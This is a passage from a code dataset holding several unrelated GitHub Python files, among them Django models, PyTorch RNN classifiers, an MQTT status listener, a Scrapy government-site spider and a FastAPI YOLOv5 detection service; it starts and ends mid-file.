Assumes that the cursor is in the row where the\n drawing should start.\"\"\"\n\n num_lines = self.hit_list_limit + 1\n if not self._ui_shown:\n # Ensure that there are enough empty lines at the bottom of the\n # terminal to show the UI\n self.terminal.write(\"\\n\" * num_lines)\n self.terminal.move_cursor(dy=-num_lines)\n self._ui_shown = True\n\n query = self.query\n\n self._best_matches = self.index.search(query) if self.index else []\n if self._best_matches and self._selected_index is None:\n self._selected_index = 0\n self._fix_selected_index()\n\n with self.terminal.hidden_cursor():\n # Draw the matches first\n self.terminal.move_cursor(x=0, dy=1)\n num_lines_printed = self._show_matches(self._best_matches)\n self.terminal.clear_to_eos()\n\n # Now draw the prompt and the query\n self.terminal.move_cursor(x=0, dy=-num_lines_printed-1)\n self.terminal.write(self.prompt, raw=True)\n # TODO: truncate the query from the front if too wide\n self.terminal.write(query, raw=True)\n self.terminal.clear_to_eol()\n\n def reset(self):\n \"\"\"Resets the UI to the initial state (no query, no matches, no\n selection).\"\"\"\n self._best_matches = []\n self._selected_index = None\n self.query = ''\n\n @property\n def selected_index(self):\n \"\"\"Returns the index of the currently selected item on the UI.\"\"\"\n return self._selected_index\n\n @selected_index.setter\n def selected_index(self, value):\n if self._selected_index == value:\n return\n\n self._selected_index = value\n self._fix_selected_index()\n self.refresh()\n\n @property\n def selected_item(self):\n \"\"\"The currently selected item on the UI.\"\"\"\n if self._selected_index is None or self._selected_index < 0:\n return None\n else:\n return self._best_matches[self._selected_index]\n\n def _fix_selected_index(self):\n \"\"\"Ensures that the index of the selected item is within valid\n bounds.\"\"\"\n if not self._best_matches:\n self._selected_index = None\n elif self._selected_index is not None:\n self._selected_index = max(\n 0, min(self._selected_index, self.num_visible_matches)\n )\n\n def _show_matches(self, matches):\n \"\"\"Shows the given list of matches on the terminal.\n\n Returns:\n int: the number of lines printed on the terminal\n \"\"\"\n matches = matches or []\n limit = self.hit_list_limit\n\n self.renderer.attach_to_terminal(self.terminal)\n for index, match in enumerate(matches[:limit]):\n selected = (index == self._selected_index)\n rendered_match = self.renderer.render(match, selected=selected)\n self.terminal.write(rendered_match, raw=True)\n self.terminal.write(\"\\n\")\n\n return min(len(matches), limit)\n","repo_name":"ntamas/python-selecta","sub_path":"selecta/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":11036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"38314425466","text":"from django.db import models\nfrom django.contrib.auth.models import User, AbstractUser\nfrom django.contrib.auth import get_user_model\n\n\nGENDER_CHOICES = (\n ('M', 'Masculino'),\n ('F', 'Femenino'),\n ('O', 'OTRO')\n)\n\nFACULTY_CHOICES = (\n ('FI', 'Facultad de Ingeniería'),\n ('FC', 'Facultad de Ciencias'),\n ('FCA', 'Facultad de Contaduría y Administración'),\n ('FO', 'Facultad de Odontología'),\n ('FA', 'Facultad de Arquitectura'),\n ('FAD', 'Facultad de Artes y Diseño'),\n ('FQ', 'Facultad de Química'),\n ('FD','Facultad de Derecho'),\n ('FCPS', 'Facultad de Ciencias Políticas y Sociales'),\n ('FM','Facultad de Medicina'),\n ('FE', 'Facultad de 
Economía'),\n ('FMVZ','Facultad de Medicina Veterinaria y Zootecnia'),\n ('FP','Facultad de Psicología'),\n ('FFL', 'Facultad de Filosofía y Letras'),\n)\n\nclass Usuario(AbstractUser):\n nombre = models.CharField(max_length=30)\n genero = models.CharField(max_length= 1, choices=GENDER_CHOICES)\n correo = models.EmailField()\n # otro_correo = models.EmailField()\n facultad = models.CharField(max_length=4, choices=FACULTY_CHOICES)\n fecha_nacimiento = models.DateField(null=True)\n credencial = models.ImageField()\n verificado = models.BooleanField(default=False)\n class Meta(AbstractUser.Meta):\n swappable = 'AUTH_USER_MODEL'\n\n# Create your models here.\n\nclass Pregunta(models.Model):\n id = models.IntegerField(auto_created=True, primary_key=True)\n texto = models.CharField(max_length=100)\n\nclass Respuesta(models.Model):\n id = models.IntegerField(auto_created=True, primary_key=True)\n pregunta = models.ForeignKey(Pregunta, on_delete=models.CASCADE)\n imagen = models.ImageField()\n\nclass Respuesta_Usuario(models.Model):\n id = models.IntegerField(auto_created=True, primary_key=True)\n respuesta = models.ForeignKey(Respuesta, on_delete=models.CASCADE)\n usuario = models.ForeignKey(get_user_model(), on_delete=models.CASCADE)\n imagen = models.ImageField()\n\n","repo_name":"roher1727/newcompa","sub_path":"usuario/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7971031698","text":"'''\nhttp://cs231n.stanford.edu/reports/2017/pdfs/903.pdf\nhttps://github.com/czanoci/cs231n_cris_jim\n'''\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import init\nimport torchvision.models as models\nfrom torch.nn.utils.rnn import pack_padded_sequence\nfrom torch.autograd import Variable\nimport sys\nfrom models.vgg16 import *\n# from vgg16 import *\n\nclass Sliceconv(nn.Module): \n def __init__(self,inputsize=512,hiddensize=512,outputsize=512):\n super(Sliceconv, self).__init__()\n self.conv=torch.nn.Conv1d(inputsize,outputsize,kernel_size=5,stride = 1 ,padding=2)\n \n # self.conv=nn.Sequential(\n # #torch.nn.Conv1d(inputsize,hiddensize,kernel_size=5,stride = 1 ,padding=2),\n # torch.nn.Conv1d(hiddensize,outputsize,kernel_size=5,stride = 1 ,padding=2)\n # )\n def forward(self, x):\n x=x.permute(1, 0)\n x=x.unsqueeze(0)\n x=self.conv(x)\n x=x.squeeze(0)\n x=x.permute(1, 0)\n return x\n\n#%%\nclass SliceRNN(nn.Module):\n def __init__(self,inputsize=512,hiddensize=64,layer = 4,rnntype='GRU'):\n super(SliceRNN, self).__init__()\n # self.conv1 = Sliceconv()\n self.type=rnntype\n # self.outputsize=outputsize\n self.layer = layer \n self.hiddensize=hiddensize\n \n if self.type=='GRU':\n self.RNN=nn.GRU(inputsize,self.hiddensize,layer,batch_first=True,bidirectional=True)\n elif self.type=='LSTM':\n self.RNN=nn.LSTM(inputsize,self.hiddensize,layer,batch_first=True,bidirectional=True)\n else:\n print(\"RNN type ERROR!!!!\")\n qwe\n # self.linear=nn.Linear(hiddensize*2,outputsize)\n def forward(self, x):\n # x = self.conv1(x)\n x=x.unsqueeze(0)\n if self.type=='GRU':\n output,hn=self.RNN(x)\n elif self.type=='LSTM':\n output,hn=self.RNN(x)\n \n output=torch.squeeze(output,0)\n # output=self.linear(output)\n return output\n \n#%%\nclass NeckRNN(nn.Module):\n def __init__(self,inputsize=224,hiddensize=256,outputsize=5,layer = 4,rnntype='GRU',FE=None):\n super(NeckRNN, self).__init__()\n if FE==None:\n self.cnn=VGG16_FE(inputsize=inputsize)\n else:\n self.cnn=FE\n 
self.rnn=SliceRNN(hiddensize=hiddensize,layer = layer,rnntype=rnntype)\n # self.linear=nn.Linear(512,outputsize)\n \n def forward(self, x):\n x=self.cnn(x)\n print(x.size())\n y=self.rnn(x)\n x=x+y\n # x=self.linear(F.relu(x))\n return x\n#%% \nclass DecoderBinaryRNN(nn.Module):\n def __init__(self, hidden_size, cnn_output_size, num_labels,vgg = None,mode = \"gru\"):\n \"\"\"Set the hyper-parameters and build the layers.\"\"\"\n super(DecoderBinaryRNN, self).__init__()\n \n self.mode = mode\n self.num_labels = num_labels\n self.SRNN = SliceRNN()\n # self.conv1 = Sliceconv()\n # self.NeckRNN = NeckRNN(FE=vgg)\n self.linear_img_to_lstm = nn.Linear(cnn_output_size, hidden_size)\n if self.mode == \"lstm\":\n self.lstm = nn.LSTM(1, hidden_size, 1, batch_first=True, bidirectional=True)\n self.linear_final = nn.Linear(hidden_size*2, 1)\n elif self.mode == \"gru\":\n self.gru = nn.GRU(1, hidden_size, 1, batch_first=True , bidirectional=True)\n self.linear_final = nn.Linear(hidden_size*2, 1)\n\n def forward(self, cnn_features):\n \n # cnn_features = self.conv1(cnn_features)\n rnn_features = self.SRNN(cnn_features)\n # rnn_features = self.NeckRNN(cnn_features)\n # print(rnn_features.size())\n h0 = torch.unsqueeze(self.linear_img_to_lstm(rnn_features), 0).to(\"cuda\")\n c0 = torch.autograd.Variable(torch.zeros(h0.size(0), h0.size(1), h0.size(2)), requires_grad = False).to(\"cuda\")\n zero_input = torch.autograd.Variable(torch.zeros(cnn_features.size(0), self.num_labels, 1), requires_grad = False).to(\"cuda\")\n\n if self.mode == \"lstm\":\n hiddens, _ = self.lstm(zero_input, (h0.repeat(2,1,1), c0.repeat(2,1,1)))\n elif self.mode == \"gru\":\n hiddens, _ = self.gru(zero_input, h0.repeat(2,1,1))\n\n unbound = torch.unbind(hiddens, 1)\n combined = [self.linear_final(elem) for elem in unbound]\n combined = torch.stack(combined, 1).squeeze(2)\n \n return combined\n \n#%%\n\nif __name__ == \"__main__\":\n hidden_size = 256\n cnn_output_size = 128\n num_labels = 5\n # birnn = SliceRNN().to(\"cuda\") \n birnn = DecoderBinaryRNN(hidden_size, cnn_output_size, num_labels,mode = \"gru\").to(\"cuda\") \n # birnn = NeckRNN().to(\"cuda\") \n in_p = torch.rand(2,512).to(\"cuda\") \n # in_p = torch.rand(2,1,224,224).to(\"cuda\") \n \n out = birnn(in_p)\n print(out.size() )\n \n # print(out.size())\n\n\n\n\n","repo_name":"yohschang/Deep_learning","sub_path":"multiclass_classification/models/Binary_model_rnn.py","file_name":"Binary_model_rnn.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36122446686","text":"broker_address=\"2.0.0.2\" \n#\n# For a real world test with test.mosquitto.org (91.121.93.94) set the MQTT Broker IP on the Mirror Head to the same as below. Make sure you also \n# set the gateway correct so the Mirror Head can access the internet.\n# Send: mosquitto_pub -h 91.121.93.94 -t \"DPI/MH/global/input\" -m \"64 0 64 0 0 0 0 0 0 255 0 0 255 0 1\", this will move the mirror and set the LED to blue. 
\n# To regain ArtNet/Web/DMX controll set the last byte to 0:\n# mosquitto_pub -h 91.121.93.94 -t \"DPI/MH/global/input\" -m \"64 0 64 0 0 0 0 0 0 255 0 0 255 0 0\"\n# \n# ENABLE THIS FOR INERNET TEST:\n# broker_address=\"91.121.93.94\" \n\n\nimport paho.mqtt.client as mqtt \nimport struct\nco=0\n\ndef process_data(c,u,m):\n global co\n try:\n co+=1\n # telemetry status structure from the MH is in the form:\n # struct __attribute__((__packed__)) telemetry_ {\n # uint32_t axis_position[2]; // Target position in AXIS units\n # uint32_t dmx_position[2]; // Target DMX position \n # uint32_t tmc_step[2]; // Actual position of the motors in AXSIS units\n # uint8_t angles[2]; // selected PAN and TILT max. angle\n # }\n x=struct.unpack('IIIIIIBB',m.payload)\n print(m.topic,x) # simple output\n #print(co,x[0],\" \",x[4],\" \",x[1],\" \",x[5]) # use this for plotting \n except Exception as err:\n print(\"error\", err)\n\n\nclient = mqtt.Client(\"myuniq-id\") \nclient.on_message = process_data\nclient.connect(broker_address) \nclient.subscribe(\"DPI/MH/#\")\nclient.loop_forever()\n","repo_name":"DynamicProjectionInstitute/MirrorHead-examples","sub_path":"mqtt-status-display.py","file_name":"mqtt-status-display.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36861193143","text":"import math\nimport os\nfrom pathlib import Path\n\nimport numpy as np\n\n\ndef get_path_length(lat1, lng1, lat2, lng2):\n # '''calculates the distance between two lat, long coordinate pairs'''\n r = 6371000 # radius of earth in m\n lat1rads = math.radians(lat1)\n lat2rads = math.radians(lat2)\n delta_lat = math.radians((lat2 - lat1))\n delta_lng = math.radians((lng2 - lng1))\n a = math.sin(delta_lat / 2) * math.sin(delta_lat / 2) + math.cos(\n lat1rads) * math.cos(lat2rads) * math.sin(delta_lng / 2) * math.sin(\n delta_lng / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = r * c\n return d\n\n\ndef get_destination_lat_long(lat, lng, azimuth, distance):\n # '''returns the lat an long of destination point\n # given the start lat, long, aziuth, and distance'''\n r = 6378.1 # Radius of the Earth in km\n brng = math.radians(azimuth) # Bearing is degrees converted to radians.\n d = distance / 1000 # Distance m converted to km\n lat1 = math.radians(lat) # Current dd lat point converted to radians\n lon1 = math.radians(lng) # Current dd long point converted to radians\n lat2 = math.asin(\n math.sin(lat1) * math.cos(d / r) + math.cos(lat1) * math.sin(\n d / r) * math.cos(brng))\n lon2 = lon1 + math.atan2(math.sin(brng) * math.sin(d / r) * math.cos(lat1),\n math.cos(d / r) - math.sin(lat1) * math.sin(lat2))\n # convert back to degrees\n lat2 = math.degrees(lat2)\n lon2 = math.degrees(lon2)\n return [lat2, lon2]\n\n\ndef calculate_bearing(lat1, lng1, lat2, lng2):\n # '''calculates the azimuth in degrees from start point to end point'''\n start_lat = math.radians(lat1)\n start_long = math.radians(lng1)\n end_lat = math.radians(lat2)\n end_long = math.radians(lng2)\n d_long = end_long - start_long\n d_phi = math.log(math.tan(end_lat / 2.0 + math.pi / 4.0) / math.tan(\n start_lat / 2.0 + math.pi / 4.0))\n if abs(d_long) > math.pi:\n if d_long > 0.0:\n d_long = -(2.0 * math.pi - d_long)\n else:\n d_long = (2.0 * math.pi + d_long)\n bearing = (math.degrees(math.atan2(d_long, d_phi)) + 360.0) % 360.0\n return bearing\n\n\ndef generate_points(interval, azimuth, lat1, lng1, lat2, lng2):\n # '''returns every coordinate pair 
inbetween two coordinate\n # pairs given the desired interval'''\n\n d = get_path_length(lat1, lng1, lat2, lng2)\n remainder, dist = math.modf((d / interval))\n counter = float(interval)\n coords = [[lat1, lng1]]\n for distance in range(0, int(dist)):\n coord = get_destination_lat_long(lat1, lng1, azimuth, counter)\n counter = counter + float(interval)\n coords.append(coord)\n coords.append([lat2, lng2])\n return coords\n\n\ndef generate_linear_trajectories(path, array: np.ndarray, interval: float,\n map_number: int, senario:int):\n\n for i, points in enumerate(array):\n lat1 = points[0]\n lng1 = points[1]\n lat2 = points[2]\n lng2 = points[3]\n azimuth = calculate_bearing(lat1, lng1, lat2, lng2)\n coords = generate_points(interval, azimuth, lat1, lng1, lat2, lng2)\n # np.savetxt(path / f'+1}.txt', coords)\n if not os.path.exists(f'{path}/senario_{senario}'):\n os.mkdir(f'{path}/senario_{senario}')\n np.savetxt(f'{path}/senario_{senario}/map{map_number}_{i+1}.txt', coords)\n print('Траектории сгенерированы и сохраены успешно в папку: ', path)\n\n","repo_name":"amjad-hub/test","sub_path":"points.py","file_name":"points.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11497734680","text":"from rest_framework_json_api import serializers\n\nfrom inmobiliaria.serializers import InmobiliariaSerializer\nfrom inmueble.constants import LISTA_NOMBRE_NO_PERMITIDOS\nfrom inmueble.models import Casa, Servicio\n\n\nclass ServicioSerializer(serializers.ModelSerializer):\n class Meta:\n model = Servicio\n fields = ('nombre', 'fecha_creacion', 'usuario')\n\n included_serializers = {\n 'usuario': 'usuario.serializers.UsuarioSerializer',\n }\n\n def validate_nombre(self, nombre):\n nombre = nombre.lower()\n if Servicio.objects.activos().filter(nombre=nombre).exists():\n raise serializers.ValidationError('El servicio {} ya existe'.format(nombre))\n\n if nombre.startswith(LISTA_NOMBRE_NO_PERMITIDOS):\n raise serializers.ValidationError('El nombre indicado comienza con un valor no permitido')\n\n return nombre\n\n\nclass CasaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Casa\n fields = serializers.ALL_FIELDS\n\n included_serializers = {\n 'inmobiliaria': InmobiliariaSerializer,\n 'servicios': ServicioSerializer,\n }\n","repo_name":"wbivanco/inmobiliarias","sub_path":"project/apps/inmueble/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44952643286","text":"import datetime\nimport json\nimport argparse\nimport pandas as pd\nimport re\nimport dateutil\nfrom dateutil.parser import isoparse\nfrom dateutil.tz import UTC\n\n\n#-i is the input file\n#-o is the output file\nparser = argparse.ArgumentParser()\nparser.add_argument('-i','--input_file',help='Input file')\nparser.add_argument('-o','--output_file',help='Output file')\nargs = parser.parse_args()\n\ndef main():\n file = open_and_load(args.input_file)\n file2 = title_check(file)\n file = change_title(file2)\n file2 = check_author(file)\n file = check_count_convert(file2)\n file2 = ISO_check_UTC_convert(file)\n file = check_tags(file2)\n write_to_file(file)\n\n\n#open and load the File into a pyton array\n#this also removes invalid JSON objects that are missing the last } 5\ndef open_and_load(input):\n raw_data = []\n f = open(input,'r+')\n for line in f:\n try: \n json_line = 
json.loads(line)\n raw_data.append(json_line)\n\n except:\n continue\n f.close()\n return raw_data\n#lets remove all lines that dont have a title or title_text 1\ndef title_check(raw_data):\n title_only = []\n for i in range(0,len(raw_data)):\n if ('title' in raw_data[i].keys() or 'title_text' in raw_data[i].keys()):\n title_only.append(raw_data[i])\n return title_only\n#change all title_text to title 2\ndef change_title(title_only):\n for i in range(0,len(title_only)):\n \n if ('title_text' in title_only[i].keys()):\n print('')\n title_only[i]['title'] = title_only[i]['title_text']\n del title_only[i]['title_text']\n return title_only\n#remove all objects where the author field is empty, null, or N/A 6\ndef check_author(title_only):\n data = []\n for i in range(0,len(title_only)):\n \n if (title_only[i]['author'] != 'N/A' and title_only[i]['author'] != None and title_only[i]['author'] != 'n/a'):\n data.append(title_only[i])\n return data\n#check if str, int, float then convert to int 7, 8\ndef check_count_convert(data):\n swag = []\n for i in range(0,len(data)):\n if('total_count' not in data[i].keys()):\n swag.append(data[i])\n continue\n if(type(data[i]['total_count']) == int or type(data[i]['total_count']) == str or type(data[i]['total_count']) == float):\n \n try:\n data[i]['total_count'] = int(float(data[i]['total_count']))\n swag.append(data[i])\n except:\n continue\n return swag\n#check if date is ISO standard 4\ndef ISO_check_UTC_convert(swag):\n data = []\n for i in range(0,len(swag)):\n try:\n dateutil.parser.isoparse(swag[i]['createdAt'])\n data.append(swag[i])\n except:\n continue\n #convert to UTC 3\n for i in range(0,len(data)):\n dt = isoparse(data[i]['createdAt'])\n data[i]['createdAt'] = str(dt.astimezone(UTC))\n return data\n#9 tags\ndef check_tags(data):\n for i in range(0,len(data)):\n if('tags' not in data[i].keys()):\n continue\n\n all_tags = []\n for tag in data[i]['tags']:\n all_tags.extend((tag.split(' ')))\n data[i]['tags'] = all_tags\n return data\n#write to output file 10\ndef write_to_file(data):\n with open(args.output_file,'w') as f:\n json.dump(data, f,indent=4)\n\nif __name__ == '__main__':\n main()\n","repo_name":"knowo1234/Data-Science-Course-McGill","sub_path":"COMP_598/assign_5/src/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16963187827","text":"#utilizando variáveis dentro do laço\nfor p in range(1,6):\n peso = int(input(f\"DIGITE O SEU PESO {p}º>> \"))\n if p == 1:\n maior = peso\n menor = peso\n else:\n if peso>maior:\n maior = peso\n if peso max(defined_levels): # Case 3.1\n completeness_level = max(defined_levels)\n elif specified_level < min(defined_levels): # Case 3.2\n completeness_level = min(defined_levels)\n else: # Case 3.3\n # Find the maximum defined level less than specified_level\n lesser_defined_level_dist = sys.maxsize\n for level in defined_levels:\n if level <= specified_level and lesser_defined_level_dist > (specified_level - level):\n completeness_level = level\n lesser_defined_level_dist = lesser_defined_level_dist - level\n logging.info(\"Specified level ({}) not found in defined levels. 
Setting level to {}\".format(str(CompletenessLevel(specified_level)), str(completeness_level)))\n else: # Case 4\n completeness_level = specified_level\n logging.info(\"Setting the completeness level to {}\".format(str(CompletenessLevel(completeness_level))))\n\n return completeness_level","repo_name":"ANISH-GOTTAPU/sonic-mgmt-anish","sub_path":"tests/common/plugins/test_completeness/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3994837877","text":"from functools import reduce\nfrom itertools import zip_longest as zlo\n\ndef solve(a,b):\n\n primes = []\n total = 0\n \n for i in range(a,b):\n if is_prime(i): primes.append(i)\n for idx,prime in enumerate(primes):\n for p1,p2 in zlo([prime], primes[idx:], fillvalue=prime):\n if check([p1,p2]):\n total += 1\n \n return total \n \n \ncheck = lambda n: is_prime(reduce(lambda x,y: x+y, map(int, str(n[0]*n[1])))) \n\n\nis_prime = lambda n: False if n<2\\\n else n==2\\\n or all(n%i!=0 for i in range(2,int(n**0.5)+1))\n","repo_name":"Orange9000/Codewars","sub_path":"Solutions/6kyu/6kyu_prime_reversion.py","file_name":"6kyu_prime_reversion.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"81"} +{"seq_id":"26314233071","text":"import scrapy\nimport pickle\nimport os\nimport ast\nfrom urllib import parse\nfrom scrapy.selector import Selector\n\nclass HeilongjiangSpider(scrapy.Spider):\n name = \"Heilongjiang\"\n if not os.path.exists('../../data/HTML_pk/%s' % name):\n os.makedirs('../../data/HTML_pk/%s' % name)\n if not os.path.exists('../../data/text/%s' % name):\n os.makedirs('../../data/text/%s' % name)\n def start_requests(self):\n total_page = 6389\n url_base = 'http://gkml.dbw.cn/gkml/web/data/ztfl.ashx?s=20&p={0}&c=1&k=&t='\n for i in range(total_page):\n yield scrapy.Request(url=url_base.format(str(i+1)), callback=self.parse)\n\n def parse(self,response):\n detail_page_links = []\n detail_url_base = 'http://gkml.dbw.cn/gkml/web/data/detail.ashx?t=2&d={0}'\n for piece_dict in ast.literal_eval(response.text[25:-29])['data']:\n UID = piece_dict['ID']\n piece_dict['UID'] = UID\n piece_dict['date'] = piece_dict['time']\n detail_page_links.append(detail_url_base.format(UID))\n piece_dict['crawl state'] = 'half'\n yield piece_dict\n yield from response.follow_all(detail_page_links, callback = self.parse_content)\n\n def parse_content(self, response):\n UID = response.url.split('=')[-1]\n with open('../../data/HTML_pk/%s/%s.pkl' % (self.name,UID), 'wb') as f:\n pickle.dump(response.text,f)\n paragraph_list = []\n new_text = parse.unquote_plus(response.text[7:-6])\n for escape_text in Selector(text=new_text).css('div.zwnr *::text').getall():\n paragraph = escape_text.replace(\"%\",\"\\\\\").encode(\"utf-8\").decode(\"unicode_escape\") \n paragraph_list.append(paragraph)\n with open('../../data/text/%s/%s.txt' % (self.name,UID), 'w') as f:\n f.write('\\n'.join(paragraph_list))\n return {\n 'UID': UID,\n 'mainText': paragraph_list,\n 'crawl state':'full',\n }\n","repo_name":"chairmenfrog/Policy_crawler","sub_path":"src/crawl_data/crawl_data/spiders/HeilongjiangSpider.py","file_name":"HeilongjiangSpider.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"1864363166","text":"from __future__ import absolute_import\n\nimport 
te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\n\n# shape limit for aicore equals 2**31\nSHAPE_SIZE_LIMIT = 2147483648\n\n# pylint: disable=locally-disabled,too-many-arguments,unused-argument\n@fusion_manager.register(\"reduce_all_d\")\ndef reduce_all_d_compute(input_data, output_data, axes,\n keepdims, kernel_name=\"reduce_all_d\"):\n \"\"\" TVM calculation process, used for fusion operation\n\n Parameters\n ----------\n input_data: TVM tensor\n the placeholder of input data\n output_data: dict\n shape and dtype of output, should be same shape and type as input\n axes: int, list ,tuple or None.\n the first axes to reduce, may be negative to index from the end\n (e.g., -1 for the last axes).\n axes may be int or list(e.g. [1,2])\n keepdims : bool or None .\n if true, retains reduced dimensions with length 1,\n default value is None\n kernel_name: str\n cce kernel name, default value is \"all_cce\"\n\n Returns\n -------\n result: TVM tensor.\n \"\"\"\n shape = te.lang.cce.util.shape_to_list(input_data.shape)\n shape_len = len(shape)\n if not axes:\n axes = range(shape_len)\n if hasattr(axes, 'index'):\n axes = list(axes)\n\n dtype = input_data.dtype\n data_fp16 = te.lang.cce.cast_to(input_data, \"float16\")\n data_abs = te.lang.cce.vabs(data_fp16)\n result_tmp = te.lang.cce.reduce_min(data_abs, axes, keepdims=False)\n result = te.lang.cce.cast_to(result_tmp, dtype, True)\n\n return result\n\n@util.check_input_type(dict, dict, (int, list, tuple, type(None)),\n (bool, type(None)), str)\ndef reduce_all_d(input_data, output_data, axes,\n keepdims=None, kernel_name=\"reduce_all_d\"):\n \"\"\"\n Reduce a tensor on a certain axes based on min\n\n Parameters:\n ----------\n input_data: dict\n shape and dtype of input_data, only support int8\n output_data: dict\n source data type, only support int8\n axes : int, list ,tuple or None.\n the first axes to reduce, may be negative to index from the end\n (e.g., -1 for the last axes).\n axes may be int or list(e.g. 
[1,2])\n keepdims : bool or None .\n if true, retains reduced dimensions with length 1,\n default value is None\n kernel_name : str\n cce kernel name, default value is \"cce_all\"\n\n Returns\n -------\n None\n \"\"\"\n input_shape = input_data.get(\"shape\")\n input_dtype = input_data.get(\"dtype\").lower()\n if input_dtype == \"bool\":\n input_dtype = \"int8\"\n util.check_kernel_name(kernel_name)\n util.check_shape_rule(input_shape)\n util.check_shape_size(input_shape, SHAPE_SIZE_LIMIT)\n util.check_dtype_rule(input_dtype, (\"int8\"))\n\n shape_len = len(input_shape)\n if not axes:\n axes = range(shape_len)\n\n if hasattr(axes, 'index'):\n axes = list(axes)\n axes = util.axis_check(shape_len, axes)\n\n if not isinstance(axes, int):\n for i in axes:\n if i >= len(input_shape):\n raise RuntimeError(\"axes should be less than dimension\")\n else:\n if axes >= len(input_shape):\n raise RuntimeError(\"axes should be less than dimension\")\n\n # 5HD Special param for 5hd schedule\n is_5hdc = util.check_and_init_5hdc_reduce_support(input_data, axes, kernel_name)\n if not is_5hdc:\n input_shape, axes = util.shape_refine(list(input_shape), axes)\n input_shape, axes = util.simplify_axis_shape(input_shape, axes)\n\n data_input = tvm.placeholder(input_shape, name=\"data_input_\" + kernel_name,\n dtype=input_dtype)\n result = reduce_all_d_compute(data_input, output_data, axes,\n keepdims, kernel_name)\n\n with tvm.target.cce():\n sch = generic.auto_schedule(result)\n\n config = {\"print_ir\": False,\n \"name\": kernel_name,\n \"tensor_list\": [data_input, result]}\n te.lang.cce.cce_build_code(sch, config)\n","repo_name":"jizhuoran/caffe-huawei-atlas-convertor","sub_path":"convertor/huawei/impl/reduce_all_d.py","file_name":"reduce_all_d.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"70554061705","text":"from django.conf.urls import patterns, include, url\nfrom django.core.urlresolvers import reverse_lazy\nfrom money import views as views_money\n\nurlpatterns = patterns('',\n\n #auth\n url(r'^$', 'django.contrib.auth.views.login', name='user_login'),\n url(r'^login$', 'django.contrib.auth.views.login', name='user_login'),\n url(r'^logout$', 'django.contrib.auth.views.logout', {'next_page': reverse_lazy('user_login')} ,name='user_logout'),\n\n #app\n url (r'^dashboard$',views_money.DashBoard.as_view(), name='dashboard'),\n url(r'^entries$', views_money.EntryList.as_view(), name='entry_list'),\n url(r'^entries/create$', views_money.EntryCreate.as_view(), name='entry_create'),\n\n url(r'^banks/$', views_money.BankList.as_view(), name='bank_list'),\n url(r'^banks/edit/(?P\\d+)$', views_money.BankList.as_view(), name='bank_edit'),\n url(r'^banks/delete/(?P\\d+)$', views_money.BankDelete.as_view(), name='bank_delete'),\n\n url(r'^accounts/$', views_money.AccountList.as_view(), name='account_list'),\n url(r'^accounts/edit/(?P\\d+)$', views_money.AccountList.as_view(), name='account_edit'),\n\n url(r'^people/$', views_money.PersonList.as_view(), name='person_list'),\n url(r'^people/edit/(?P\\d+)$', views_money.PersonList.as_view(), name='person_edit'),\n\n)\n","repo_name":"gutorocher/django-cashflow","sub_path":"money/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"6476664160","text":"from fastapi import FastAPI, File, UploadFile\nfrom fastapi.param_functions import 
Path\nfrom segmentation import get_yolov5, get_image_from_bytes, get_pest_yolov5,get_image_from_bytes_array\nfrom starlette.responses import Response\nimport io\nfrom PIL import Image\nimport json\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.middleware.cors import CORSMiddleware\nimport os\nfrom fastapi.responses import FileResponse\nimport random\n\n\nmodel = get_yolov5()\npest_model = get_pest_yolov5()\nIMAGEDIR = \"fastapi-images/\"\nBATCHDIR = \"\"\n\nmylist = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','p','q','r','s','t','u','v','w','x','y','z']\n\napp = FastAPI(\n title=\"Object Detection Api\",\n description=\"\"\"Obtain object value out of image\n and return image and json result\"\"\",\n version=\"0.0.1\",\n)\n\norigins = [\n \"http://localhost\",\n \"http://localhost:8000\",\n \"http://localhost:3000\",\n \"*\"\n ]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\napp.mount('/static', StaticFiles(directory='static'), name='static')\n\n\n@app.get('/notify/v1/health')\ndef get_health():\n \"\"\"\n Usage on K8S\n readinessProbe:\n httpGet:\n path: /notify/v1/health\n port: 80\n livenessProbe:\n httpGet:\n path: /notify/v1/health\n port: 80\n :return:\n dict(msg='OK')\n \"\"\"\n return dict(msg='OK')\n\n\n@app.post(\"/object-to-json\")\nasync def detect_weed_return_json_result(file: bytes = File(...)):\n input_image = get_image_from_bytes(file)\n results = model(input_image)\n detect_res = 